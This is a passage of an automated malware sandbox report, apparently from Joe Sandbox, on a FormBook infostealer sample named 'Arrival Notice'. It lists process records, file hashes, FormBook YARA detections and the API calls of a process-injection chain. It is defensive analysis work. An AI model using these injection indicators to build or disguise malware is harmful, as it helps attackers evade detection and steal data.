                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.4145942819.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.4145942819.0000000002A60000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000012.00000002.4143205366.00000000024B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000012.00000002.4143205366.00000000024B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                            Reputation:moderate
                                                                            Has exited:false

                                                                            Target ID:19
                                                                            Start time:16:38:36
                                                                            Start date:19/06/2024
                                                                            Path:C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe"
                                                                            Imagebase:0x3c0000
                                                                            File size:140'800 bytes
                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000013.00000002.4147800420.0000000005740000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000013.00000002.4147800420.0000000005740000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                            Reputation:high
                                                                            Has exited:false

                                                                            Target ID:20
                                                                            Start time:16:38:52
                                                                            Start date:19/06/2024
                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                            Imagebase:0x7ff6bf500000
                                                                            File size:676'768 bytes
                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:22
                                                                            Start time:16:40:17
                                                                            Start date:19/06/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\-6qxw.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\-6qxw.exe"
                                                                            Imagebase:0x80000
                                                                            File size:695'808 bytes
                                                                            MD5 hash:BD0CF4524C08026BA27005393E1F93A9
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Antivirus matches:
                                                                            • Detection: 100%, Joe Sandbox ML
                                                                            • Detection: 62%, ReversingLabs
                                                                            Has exited:true

                                                                            Target ID:23
                                                                            Start time:16:40:18
                                                                            Start date:19/06/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\-6qxw.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\-6qxw.exe"
                                                                            Imagebase:0x220000
                                                                            File size:695'808 bytes
                                                                            MD5 hash:BD0CF4524C08026BA27005393E1F93A9
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true

                                                                            Target ID:24
                                                                            Start time:16:40:18
                                                                            Start date:19/06/2024
                                                                            Path:C:\Users\user\AppData\Local\Temp\-6qxw.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\-6qxw.exe"
                                                                            Imagebase:0x5f0000
                                                                            File size:695'808 bytes
                                                                            MD5 hash:BD0CF4524C08026BA27005393E1F93A9
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000018.00000002.3466776622.00000000010B0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000018.00000002.3466776622.00000000010B0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000018.00000002.3464254438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000018.00000002.3464254438.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000018.00000002.3470248065.0000000001470000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000018.00000002.3470248065.0000000001470000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                                                                            Has exited:true

                                                                            Target ID:25
                                                                            Start time:16:40:47
                                                                            Start date:19/06/2024
                                                                            Path:C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe"
                                                                            Imagebase:0x3c0000
                                                                            File size:140'800 bytes
                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000019.00000002.4145544196.0000000002600000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000019.00000002.4145544196.0000000002600000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                                                                            Has exited:false

                                                                            Target ID:26
                                                                            Start time:16:40:49
                                                                            Start date:19/06/2024
                                                                            Path:C:\Windows\SysWOW64\runonce.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Windows\SysWOW64\runonce.exe"
                                                                            Imagebase:0xdd0000
                                                                            File size:47'104 bytes
                                                                            MD5 hash:9E16655119DDE1B24A741C4FD4AD08FC
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001A.00000002.4145607762.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001A.00000002.4145607762.0000000000D10000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001A.00000002.4145710569.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001A.00000002.4145710569.0000000000D50000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001A.00000002.4143217663.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001A.00000002.4143217663.0000000000800000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                            Has exited:false

                                                                            Target ID:27
                                                                            Start time:16:41:02
                                                                            Start date:19/06/2024
                                                                            Path:C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe
                                                                            Wow64 process (32bit):true
                                                                            Commandline:"C:\Program Files (x86)\BamjedyigoCtYKHyiRdgSsfIoCsnPSndQSHygnlHwFsKjFWUEASoLkPG\WRrRgOfpwFEFXfaWUCsdTxK.exe"
                                                                            Imagebase:0x3c0000
                                                                            File size:140'800 bytes
                                                                            MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Yara matches:
                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000001B.00000002.4147461137.0000000004FA0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 0000001B.00000002.4147461137.0000000004FA0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                                            Has exited:false

                                                                            Target ID:28
                                                                            Start time:16:41:19
                                                                            Start date:19/06/2024
                                                                            Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                            Wow64 process (32bit):false
                                                                            Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                                            Imagebase:0x7ff6bf500000
                                                                            File size:676'768 bytes
                                                                            MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                                            Has elevated privileges:false
                                                                            Has administrator privileges:false
                                                                            Programmed in:C, C++ or other language
                                                                            Has exited:true


                                                                              Execution Graph

                                                                              Execution Coverage:11.8%
                                                                              Dynamic/Decrypted Code Coverage:100%
                                                                              Signature Coverage:0%
                                                                              Total number of Nodes:196
                                                                              Total number of Limit Nodes:12
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd

                                                                              Control-flow Graph

                                                                              control_flow_graph 294 130d030-130d0cf GetCurrentProcess 298 130d0d1-130d0d7 294->298 299 130d0d8-130d10c GetCurrentThread 294->299 298->299 300 130d115-130d149 GetCurrentProcess 299->300 301 130d10e-130d114 299->301 303 130d152-130d16d call 130d619 300->303 304 130d14b-130d151 300->304 301->300 306 130d173-130d1a2 GetCurrentThreadId 303->306 304->303 308 130d1a4-130d1aa 306->308 309 130d1ab-130d20d 306->309 308->309
                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32 ref: 0130D0BE
                                                                              • GetCurrentThread.KERNEL32 ref: 0130D0FB
                                                                              • GetCurrentProcess.KERNEL32 ref: 0130D138
                                                                              • GetCurrentThreadId.KERNEL32 ref: 0130D191
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706937025.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_1300000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: Current$ProcessThread
                                                                              • String ID:
                                                                              • API String ID: 2063062207-0
                                                                              • Opcode ID: 677bf8eb173aa7d11f51f5ff81e9175427828788a37e833ffaa6a0a5265bfb5f
                                                                              • Instruction ID: 5aeb44f1808c1c36e338a385f3fed17b725d23e07ef6b941852e785716592efd
                                                                              • Opcode Fuzzy Hash: 677bf8eb173aa7d11f51f5ff81e9175427828788a37e833ffaa6a0a5265bfb5f
                                                                              • Instruction Fuzzy Hash: 1C5146B0A003498FDB19DFA9D648BDEBBF1BF48304F208459D419A73A1DB349885CF65

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetCurrentProcess.KERNEL32 ref: 0130D0BE
                                                                              • GetCurrentThread.KERNEL32 ref: 0130D0FB
                                                                              • GetCurrentProcess.KERNEL32 ref: 0130D138
                                                                              • GetCurrentThreadId.KERNEL32 ref: 0130D191
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706937025.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_1300000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: Current$ProcessThread
                                                                              • String ID:
                                                                              • API String ID: 2063062207-0
                                                                              • Opcode ID: fb1e9bf1d76df34098c3177321df456c7216d4c86b2a7a542292c43bedbd5b7c
                                                                              • Instruction ID: bf622e3e9c4092592eb9682a03ed4c5269675eb28bfccba09d127ae4ae291ea4
                                                                              • Opcode Fuzzy Hash: fb1e9bf1d76df34098c3177321df456c7216d4c86b2a7a542292c43bedbd5b7c
                                                                              • Instruction Fuzzy Hash: CB5146B0A006098FDB18DFA9D548B9EFBF1BF48304F208459D419A73A0DB749884CF65

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 08225B26
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: CreateProcess
                                                                              • String ID:
                                                                              • API String ID: 963392458-0
                                                                              • Opcode ID: 9a31814ca501921c26dccd71168d74ccd247b0af553ecd4011ac57a5bcae28e7
                                                                              • Instruction ID: 73c254e9a44990a26a05654ebca954d0d0e1bdcfeb0b5474b9550ac27efe365e
                                                                              • Opcode Fuzzy Hash: 9a31814ca501921c26dccd71168d74ccd247b0af553ecd4011ac57a5bcae28e7
                                                                              • Instruction Fuzzy Hash: 08A18C71D1022ADFDF60DF68C941BEDBBB2BF44315F1481A9E808A7290DB749985CF91

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 08225B26
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: CreateProcess
                                                                              • String ID:
                                                                              • API String ID: 963392458-0
                                                                              • Opcode ID: 2958be532882f38512def329bf58f1964e59c9852de30112fc6e3536b49c087e
                                                                              • Instruction ID: f3c9539b6bd424d1e3e1ae6270a8e7ae6648cdf7fcd627c25294977767eea969
                                                                              • Opcode Fuzzy Hash: 2958be532882f38512def329bf58f1964e59c9852de30112fc6e3536b49c087e
                                                                              • Instruction Fuzzy Hash: 84917C71D1022ADFDF60DF68C941BEDBBB2BF48315F1481A9E808A7290DB749985CF91

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0130AFFE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706937025.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_1300000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: HandleModule
                                                                              • String ID:
                                                                              • API String ID: 4139908857-0
                                                                              • Opcode ID: 94c015148ea4b0f5e1180832202f3613c88f30c1681aa414dd3dbb9ad352ab92
                                                                              • Instruction ID: 2c8d8bfd6064c5c42f465ca3d908850b47484b58ebb5eb26d7be584081730f43
                                                                              • Opcode Fuzzy Hash: 94c015148ea4b0f5e1180832202f3613c88f30c1681aa414dd3dbb9ad352ab92
                                                                              • Instruction Fuzzy Hash: EF812670A00B098FD725DF29D46479ABBF5FF88344F008A2DD48AD7A90D775E849CB90

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • CreateActCtxA.KERNEL32(?), ref: 013059C9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706937025.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_1300000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: Create
                                                                              • String ID:
                                                                              • API String ID: 2289755597-0
                                                                              • Opcode ID: 1afe0007377fe0ee4325864a9e05a5735465f56fea6f04a49d814d3e7ad73963
                                                                              • Instruction ID: 78399c6cc534d121681074fd537381ecebf412c894f411352686fcc18aa4047b
                                                                              • Opcode Fuzzy Hash: 1afe0007377fe0ee4325864a9e05a5735465f56fea6f04a49d814d3e7ad73963
                                                                              • Instruction Fuzzy Hash: 0141E2B0C0071DCEEB25CFA9C884ADEBBF5BF45318F24805AD409AB295DB755986CF50

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • CreateActCtxA.KERNEL32(?), ref: 013059C9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706937025.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_1300000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: Create
                                                                              • String ID:
                                                                              • API String ID: 2289755597-0
                                                                              • Opcode ID: 0a3dd8c2fd4d0fae551369855cef6459864c54e4acc6d2e8a518da95d6234abe
                                                                              • Instruction ID: cd33b82a772e0ab02f289cdd9521e167c3883bd33032903d299582db48e7dee2
                                                                              • Opcode Fuzzy Hash: 0a3dd8c2fd4d0fae551369855cef6459864c54e4acc6d2e8a518da95d6234abe
                                                                              • Instruction Fuzzy Hash: 0E41D3B0C0071DCBDB25DFA9C884B9EBBF5BF45304F248059D409AB295DB755986CF90

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 082256F8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessWrite
                                                                              • String ID:
                                                                              • API String ID: 3559483778-0
                                                                              • Opcode ID: 58d902c59c3501075d9dee83ed377619521f5b5c5920d8848825040de976d617
                                                                              • Instruction ID: f1aa949fd23042a709423d06c6ac639f7f98306ab917b83dfe442099e4bee4b0
                                                                              • Opcode Fuzzy Hash: 58d902c59c3501075d9dee83ed377619521f5b5c5920d8848825040de976d617
                                                                              • Instruction Fuzzy Hash: A82148B1900359DFCB10CFA9C9847EEBBF1FF48314F108429E959A7250C7789554CBA5

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 082256F8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessWrite
                                                                              • String ID:
                                                                              • API String ID: 3559483778-0
                                                                              • Opcode ID: 21baf5ef9f710f6ef1fa0093014042972077674aff29a78d3da92c4111722d33
                                                                              • Instruction ID: 71b62b7fa0ca2cbd8b2dd8d1090b4eac8ea448579d68a2b3b3c557a64227fb60
                                                                              • Opcode Fuzzy Hash: 21baf5ef9f710f6ef1fa0093014042972077674aff29a78d3da92c4111722d33
                                                                              • Instruction Fuzzy Hash: 7C2166B1900359DFCB10CFA9C984BEEBBF5FF48310F10842AE919A7250C778A944CBA4

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 082257D8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessRead
                                                                              • String ID:
                                                                              • API String ID: 1726664587-0
                                                                              • Opcode ID: a0923d4859e914501ffca0da5087c44fa509829cf5cfc804bd15848604f19d6f
                                                                              • Instruction ID: e7cdc60ff45f94c466b0a0b45683bc8d81037f53575e70b42e181b001f81b8ea
                                                                              • Opcode Fuzzy Hash: a0923d4859e914501ffca0da5087c44fa509829cf5cfc804bd15848604f19d6f
                                                                              • Instruction Fuzzy Hash: 2C2136B1801359DFCB10CFA9C984AEEFBF1FF48320F108529E568A7290C7389944CB61

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08225116
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: ContextThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 983334009-0
                                                                              • Opcode ID: f752903aa98f70ad6c6ec7d438d1e855ec7f8261665227d774771d98973ca208
                                                                              • Instruction ID: ef3fe245d901fcd85086bece91acfe2b76439f199bdb10c38bf84581681c3b0b
                                                                              • Opcode Fuzzy Hash: f752903aa98f70ad6c6ec7d438d1e855ec7f8261665227d774771d98973ca208
                                                                              • Instruction Fuzzy Hash: 472148B19003199FDB10DFAAC5857EEBBF0AF49324F10C42AD459A7290CB789944CFA5

                                                                              Control-flow Graph

                                                                              APIs
                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 08225116
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: ContextThreadWow64
                                                                              • String ID:
                                                                              • API String ID: 983334009-0
                                                                              • Opcode ID: a402e36076aa9b3d116ec3fa2baac0fe57a74be3de188962add1ef6914fe53c7
                                                                              • Instruction ID: 0342d4061c8fef1a18a6c807363e0e21414584de3098fc881004b92e12b5c5d3
                                                                              • Opcode Fuzzy Hash: a402e36076aa9b3d116ec3fa2baac0fe57a74be3de188962add1ef6914fe53c7
                                                                              • Instruction Fuzzy Hash: 932137B1910319DFDB10DFAAC5857EEBBF4EB49324F10C429D459A7240CB78A944CFA5
                                                                              APIs
                                                                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 082257D8
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: MemoryProcessRead
                                                                              • String ID:
                                                                              • API String ID: 1726664587-0
                                                                              APIs
                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0130D717
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706937025.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_1300000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: DuplicateHandle
                                                                              • String ID:
                                                                              • API String ID: 3793708945-0
                                                                              APIs
                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 0130D717
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706937025.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_1300000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: DuplicateHandle
                                                                              • String ID:
                                                                              • API String ID: 3793708945-0
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0130B079,00000800,00000000,00000000), ref: 0130B28A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706937025.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_1300000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0
                                                                              APIs
                                                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 08225616
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              APIs
                                                                              • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,0130B079,00000800,00000000,00000000), ref: 0130B28A
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706937025.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_1300000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: LibraryLoad
                                                                              • String ID:
                                                                              • API String ID: 1029625771-0
                                                                              APIs
                                                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 08225616
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: ResumeThread
                                                                              • String ID:
                                                                              • API String ID: 947044025-0
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: ResumeThread
                                                                              • String ID:
                                                                              • API String ID: 947044025-0
                                                                              APIs
                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 0130AFFE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706937025.0000000001300000.00000040.00000800.00020000.00000000.sdmp, Offset: 01300000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_1300000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: HandleModule
                                                                              • String ID:
                                                                              • API String ID: 4139908857-0
                                                                              APIs
                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 08229DBD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost
                                                                              • String ID:
                                                                              • API String ID: 410705778-0
                                                                              APIs
                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 08229DBD
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1736982880.0000000008220000.00000040.00000800.00020000.00000000.sdmp, Offset: 08220000, based on PE: false
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8220000_Arrival Notice.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePost
                                                                              • String ID:
                                                                              • API String ID: 410705778-0
                                                                              • Opcode ID: 6c2b4c548666a8c45bb9ad7f2d9039a3179cff0474e9c2aa6e108faf56de4d66
                                                                              • Instruction ID: be6f4be6ad86b3d87cb8d59dcfff869703e4e2701302bcdc34a4b55e4d05e554
                                                                              • Opcode Fuzzy Hash: 6c2b4c548666a8c45bb9ad7f2d9039a3179cff0474e9c2aa6e108faf56de4d66
